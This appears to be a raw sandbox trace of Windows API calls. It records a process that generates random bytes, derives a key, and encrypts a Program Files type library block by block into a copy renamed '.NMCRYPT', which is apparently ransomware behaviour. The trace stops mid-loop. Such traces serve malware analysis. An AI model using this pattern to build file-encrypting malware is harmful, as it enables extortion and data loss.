[0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.135] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0168.135] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0168.135] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0168.136] CryptHashData (hHash=0x9ad778, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.136] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad778, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad338) returned 1 [0168.136] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0168.136] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0168.136] wcslen (_String="\\\\?\\") returned 0x4 [0168.136] CryptDuplicateKey (in: hKey=0x9ad338, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad138) returned 1 [0168.136] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0168.136] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0168.136] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=14336) returned 1 [0168.136] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0168.137] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.138] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.138] GetLastError () returned 0x0 [0168.138] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.150] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.150] GetLastError () returned 0x0 [0168.150] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.150] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.150] GetLastError () returned 0x0 [0168.150] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.150] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.150] GetLastError () returned 0x0 [0168.150] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.151] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.151] GetLastError () returned 0x0 [0168.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.151] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.151] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.151] GetLastError () returned 0x0 [0168.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.151] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.151] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.151] GetLastError () returned 0x0 [0168.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.151] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.151] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.151] GetLastError () returned 0x0 [0168.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.151] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.151] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.151] GetLastError () returned 0x0 [0168.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.151] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.151] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.151] GetLastError () returned 0x0 [0168.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.151] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.151] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.151] GetLastError () returned 0x0 [0168.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.152] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.152] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.152] GetLastError () returned 0x0 [0168.152] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.152] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.152] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.152] GetLastError () returned 0x0 [0168.152] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.152] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.152] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.152] GetLastError () returned 0x0 [0168.152] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.152] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.152] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.152] GetLastError () returned 0x0 [0168.152] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.152] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.152] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.152] GetLastError () returned 0x0 [0168.152] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.152] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.152] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) 